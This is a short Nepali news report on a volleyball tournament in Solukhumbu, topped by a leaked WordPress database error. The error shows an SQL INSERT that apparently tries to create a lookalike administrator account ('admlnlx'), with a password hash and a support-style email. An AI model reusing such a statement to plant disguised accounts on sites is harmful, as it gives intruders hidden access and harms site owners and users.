WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRzxq2JM8yjURkhO.SUFkJ407B7ONt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:50:14', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको थुलुङ दुधकोशी गाँउपालिका-९ लोखिममा भएको खुल्ला पुरुष भलिवल प्रतियोगिताको उपाधि नेपाल तरुण दल थुलुङ दुधकोसीले हात पारेको छ ।
सोलुखुम्बु फ्याफुल्ला समाजको आयोजनामा बुधबारदेखि जारी प्रतियोगितामा ऐसेलुखर्क गाँउपालिका ५ महेश्वरीे दोश्रो र थुलुङ दुधकोशी गाँउपालिका ९ लोखिम ए टिम तेश्रो बनेको छ ।
प्रतियोगितामा प्रथम, द्धितिय र तृतिय हुने टिमलाई क्रमश ५० हजार, ३० हजार र २० हजार प्रदान गरिएको छ । यस्तै नेपाल तरुण दलका खेलाडी सहिल मगर उत्कृष्ट खेलाडी घोषित भएको अम्बिरकजी तामाङले जानकारी दिए ।